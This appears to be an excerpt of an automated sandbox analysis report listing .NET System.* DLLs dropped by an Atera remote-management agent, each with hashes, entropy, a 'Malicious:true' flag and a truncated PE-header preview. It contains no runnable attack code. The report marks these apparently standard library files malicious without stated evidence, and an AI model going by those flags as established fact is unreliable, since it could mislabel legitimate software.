                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ..............................!.....@................................. ,..O....@..................((...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l.......#~..|...x...#Strings............#US.........#GUID...........#Blob......................3......................................$.........N.U.....U.....-...u.................0...........n.........................>.......................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8755777127592
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:hJGWe4WTYNyb8E9VF6IYijSJIVx5O3zCp:fmRQEpYi60tp
                                                                                                                                                                                                                                                                                              MD5:671D536227E78B50106A0D293D9EF1AC
                                                                                                                                                                                                                                                                                              SHA1:2B269A49DB0EBC5120EECB135AD96C78DDE1FEF9
                                                                                                                                                                                                                                                                                              SHA-256:6C679EC299B4A95EDB26E8AB547BF78E351FBD75CFFAF40FB3E65F036DBF99B9
                                                                                                                                                                                                                                                                                              SHA-512:5B2B63DB5E757B8ECB742F020DC62F0E239628DDC8A6874AB0E22D6F746F8BD4268E8544B39D7443E8FBD9456A341FD8BE8B333CCE0CF9819E6083CF533EB05A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...................................@.................................0)..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d)......H.......P ..(...................x'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings............#US.........#GUID...........#Blob......................3..................................................4...~.4...R.!...T.....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.785938093349042
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:IdW1w3WesWn3Nyb8E9VF6IYijSJIVxV4NN:R1wxd7EpYi60+j
                                                                                                                                                                                                                                                                                              MD5:6945923300972B5EA47E0598706612C2
                                                                                                                                                                                                                                                                                              SHA1:E5F2A7CF773248575B60E0C53012E028B674E19A
                                                                                                                                                                                                                                                                                              SHA-256:BCC856A3826E500F74A5F6A6C26868D99049E41A8347C70090415FA2193A045C
                                                                                                                                                                                                                                                                                              SHA-512:3505A8D5F660BA87380F6F7CE200CA5A26434502A1784BF4ADF6DC2D7AFD9DBF06C3E76B4BBBFFF2E96D27AB50D4483CD629348738FA51E6B8B6FE509AD08BB1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............~*... ...@....... ...............................L....@.................................,*..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H.......P ..$...................t(......................................BSJB............v4.0.30319......l...$...#~......t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.<.....<.....<...C.<.....<.....<...[.<...x.<...-.......<.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24616
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.595041169888453
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:0ylNGlfdqj5531HJTABhf8g2MkO1ICMbmiT2Y4Y3ocWS9sWvW8YsW1gNyb8E9VFh:0yp12Bhkg3qnV/srYEpYi60Rt
                                                                                                                                                                                                                                                                                              MD5:FE7190348625EC55451232FC2D3FB595
                                                                                                                                                                                                                                                                                              SHA1:D141B545D0F3D521DC980631858F1E4EDA517A5A
                                                                                                                                                                                                                                                                                              SHA-256:89179D883E20AE9C91F902F7A97D2086D2F73AE4658C4AF10B98F88DDFB59664
                                                                                                                                                                                                                                                                                              SHA-512:C9507147B018DC03D02A4F6E6706150F4ABAE1208163AFE6B24B36FB8618CAA21474661C424CFA0AA91B76573B4B73D2530014DC4EB67580D8F8FB495D9A2F66
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..*...........I... ...`....... ....................................@.................................gI..O....`...............8..((...........H............................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............6..............@..B.................I......H.......H(... ..................HH.......................................0..J.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%......o....*...0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..K.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%.......o...+*..0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..L.......(....~....%-.&~..........s....%.....~....%-.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853316216137834
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:4HPAW1bWieNyb8E9VF6IYijSJIVxJ5RqR:8rTmEpYi604R
                                                                                                                                                                                                                                                                                              MD5:376862D3F297321F423A4F28169DE6DB
                                                                                                                                                                                                                                                                                              SHA1:4176FCCBFE1121ED76B86DE9FECC8C4FEEEFF827
                                                                                                                                                                                                                                                                                              SHA-256:2E5DC554D21C726495799BD068C3FD882854FA533ECF7D366DE2B055B0C703B0
                                                                                                                                                                                                                                                                                              SHA-512:E9185A15A4544659E22459084A7473884328F1C09BC087348768819FAD39A403F5C9948A571813F096D27FD2984CCBC7EE065E7A1F1FBDB02A7DD0DB9ADA6CF9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..P...............((...`......P'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3......................................z...............\.....0.....3.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853448956403336
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:J+TxwFqWD7W5/PtNyby2sE9jBF6IYiYF85S35IVnxGUHFCetddDAx:wNoqWD7WJlNyb8E9VF6IYijSJIVxeQ0x
                                                                                                                                                                                                                                                                                              MD5:C4688280A8EB58E5AC6CDD201B202B06
                                                                                                                                                                                                                                                                                              SHA1:F4A67D8693A1AFBC16BB40C21ED6BC3700EFE786
                                                                                                                                                                                                                                                                                              SHA-256:C34591E43D225239F8804BC4E780B9C98FAA60FAC54AF18CF016AB1C952EBB5D
                                                                                                                                                                                                                                                                                              SHA-512:E0BDBF8B6853D6539F5545819E07CE947BE860D8753C27EB8E9647649CEFC0ADD2A2FE1304FDF9BDE712D873162EA7556162A6F6438EB2CD582F9DADA949418E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................|(..O....@..@...............((...`......D'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ..t....................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.864638231153108
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:FGETSAWUEWSWNyb8E9VF6IYijSJIVx6t0y/t:pT18+EpYi60O/t
                                                                                                                                                                                                                                                                                              MD5:975F2775F87D6C08679BC41F033BF2AE
                                                                                                                                                                                                                                                                                              SHA1:9B8441CB1201AB46C5E8CDC24D5370C0AA12F886
                                                                                                                                                                                                                                                                                              SHA-256:8BA82BCD2E912A9E36E18F75390E18F4E6EA6FFEB170A4BD85028F20035D219F
                                                                                                                                                                                                                                                                                              SHA-512:AB9A85D45D593FA7BF1F59196241B7BAB1CB81F0D17E3D72BC5C59BCE9E1D8D98EFE783A5981148D90F9260D9D70E0767DED7C3B8AD2599BDC4B890258B7DBBF
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............B)... ...@....... ....................................@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3............................................................T.....,.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):110120
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5108128247654085
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:XPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76t:XWw0SUUKBM8aOUiiGw7qa9tK/Ybi
                                                                                                                                                                                                                                                                                              MD5:7CB47D2C6D6A41F40B81FC86A91AE937
                                                                                                                                                                                                                                                                                              SHA1:A82BCC7EE4A91A1D13C30FCC6A8FC91CCED08E29
                                                                                                                                                                                                                                                                                              SHA-256:1F18D0E36EB23A81A4C399240F7DA7CC2A9823338920E677DD674417A4114D16
                                                                                                                                                                                                                                                                                              SHA-512:8C36F363195CDB1F30A4FE3392045D18F884A9E91C8EBE2D78D6C5AAE6461D4EE28044D64C18C3EAC79B8C92C76E22446DFD26A73F07F329B65C1F4B9D751081
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ....................................@.................................f...O.......................((.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.848632194828129
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:acDagtDApWSKJWFrNyb8E9VF6IYijSJIVx4LsnrdU:aPKBKnEpYi60NrdU
                                                                                                                                                                                                                                                                                              MD5:459770A3E8621ABB77D33F2CF1CBEDD6
                                                                                                                                                                                                                                                                                              SHA1:D785E240353419EFF2DC457A696BC44C5A1AC1D3
                                                                                                                                                                                                                                                                                              SHA-256:248F54212A62DFBCCA1F65E68902F7AFCBE474CCA2E87394646AAA6976DD0C08
                                                                                                                                                                                                                                                                                              SHA-512:0EE526A89B7620E0EC6B98F0F21EC5DAA33A6F468131340E89EAF9486C699FA8EEC6FDEAA7F403FC80C836128A99E8BC2D4483E07D7D0D17F9B8C7B9F5FC3586
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............+... ...@....... ..............................E.....@.................................0+..O....@..................((...`.......)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d+......H.......P ..(...................x)......................................BSJB............v4.0.30319......l...x...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................x.........w.o.....o.....\...............<.....Y.................................................G...........V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.857847377763634
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:fIWD4WmiNyb8E9VF6IYijSJIVxM0r86kT:f1oiEpYi60rkT
                                                                                                                                                                                                                                                                                              MD5:1F8B2D1E1E3A515E4117B5B240EA998F
                                                                                                                                                                                                                                                                                              SHA1:ED2B96B4309561D3C5289A0C4990EA8B6A669259
                                                                                                                                                                                                                                                                                              SHA-256:6018F6A293FDC80EDADA971BDD4E2D2439916AEBFE6D1104C83DBF49FFC7C9CF
                                                                                                                                                                                                                                                                                              SHA-512:941D3172CFDB57667D0D730B9D12110E12852DE940C4A6BA0DA7E70C58CB289F8D08EE370E386D29370FEF95BFD5D35EC4E328B8AC46C67EDAFB98B9997F50B6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................q....@..................................(..O....@..@...............((...`......\'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....d.......#US.h.......#GUID...x.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.785369657459982
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:cMWzQWc9Nyb8E9VF6IYijSJIVxN/J4BYxq:c5a5EpYi60pal
                                                                                                                                                                                                                                                                                              MD5:915B94B573B35E3C06E639F591102885
                                                                                                                                                                                                                                                                                              SHA1:FFB099716B4452496B0A93EEB343043B5B7F7103
                                                                                                                                                                                                                                                                                              SHA-256:830AA899765E40B9AD26BB34B6F6AF1CB88219479A1FEA1CFD2DA77DC722990B
                                                                                                                                                                                                                                                                                              SHA-512:5471391199163AC0953AEC472D1A46EC5F32128A2DEC93674AA188173F8D2F0BFDAA8CD2BCB193F9EE0BEBCE0CE4CB932AF19CA1E71804978F82F758EDA74DE4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............N*... ...@....... ..............................L.....@..................................)..O....@..@...............((...`.......(............................................... ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B................0*......H.......P ......................D(......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................z.....N.....:.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.724157119947449
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:QxDHKWAMWcpNyb8E9VF6IYijSJIVxlPKR0utc:YD8GtEpYi60Vcy
                                                                                                                                                                                                                                                                                              MD5:F50876298DC3B563DA6826269B2B239F
                                                                                                                                                                                                                                                                                              SHA1:FFC79793CDA43EEC70AB960AE14C6F78810A49BA
                                                                                                                                                                                                                                                                                              SHA-256:91230D54EDC8A7055732CB03923BC8FF55E8A8EED938AE60C44A527D8863D45E
                                                                                                                                                                                                                                                                                              SHA-512:5120E332688893DC089218F9482156190578723E5B394526BBD23BB2899A5DD82E576B5CF766A0B0C31A792DEA8C757AB05F5CC21C03F2AACCE358C7F7B05E1E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ...................................@................................. ,..O....@..................((...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID...........#Blob......................3................................"...............1.............{.................................Q.....j.......................n...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.829404767120568
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:wLNBEW6pWx7Nyb8E9VF6IYijSJIVxdT1qe+2P:wbMSXEpYi60pdP
                                                                                                                                                                                                                                                                                              MD5:AFE54DB9A896944978A9B7A11950DF04
                                                                                                                                                                                                                                                                                              SHA1:D168B00E2F65A67620557F9812E62CB02B200691
                                                                                                                                                                                                                                                                                              SHA-256:B5A910596D56F1082F4C3897DC6577331FC0C65E0F5919F45A9CE23D4BD748F1
                                                                                                                                                                                                                                                                                              SHA-512:C0AF4591F27B22D3E8A02A753D91BDC066DC529F59A50A615EF6CF88AE2C793912EBC26C50D05C65376F3A036679B128D715482315A3EE87B95C44BC7831E156
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................O....@.................................D(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.886594331713788
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:uKkHKW/tWBpNyb8E9VF6IYijSJIVxkNKuTCOZ8s:TumtEpYi60Wl4s
                                                                                                                                                                                                                                                                                              MD5:B5ED78D6C151FF528B8C1EA4FC01C264
                                                                                                                                                                                                                                                                                              SHA1:66B94A030731A38D93E68D344334CD3DFC79A40D
                                                                                                                                                                                                                                                                                              SHA-256:546783CAE29CD0ED62B742717CDCF601AFED16CC624CB1DA64914C09FBA7A44A
                                                                                                                                                                                                                                                                                              SHA-512:B06AB4204B11F8EF780D8F4EAAB369C9B6F79A4099657C46714423F4B5A5C768201FB0764CECE7362A470415D25F3FF9A80B66C27389C1D1683AC67C7ED17F66
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..`...............((...`.......'............................................... ............... ..H............text...4.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................$'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................W.....W...R.D.........f.......................=.....V.....}...........q.........................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.832440945277622
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:0LnfIWqrWx8Nyb8E9VF6IYijSJIVx7Dq1bbXVo8:0Df4ocEpYi60gbj28
                                                                                                                                                                                                                                                                                              MD5:DAB87FC6FD24D8DC5AEC95AEBB6DF6ED
                                                                                                                                                                                                                                                                                              SHA1:ED2B6FC9CBF4B412E0382D142A2D95D7E532BA26
                                                                                                                                                                                                                                                                                              SHA-256:9D510D9EBF5BAEF6132BAA15263CD43285A745846CD49AD1F697CF75BDC81E24
                                                                                                                                                                                                                                                                                              SHA-512:F9235636967AD0501F2A20E6A0B4BE42D46A40A04B0A6EFC16258C9C59B8F7846A629EF104EA78A2F0A1F28841AEA2BF8E50DDCC072D97506FA7CBBC6B5233F7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
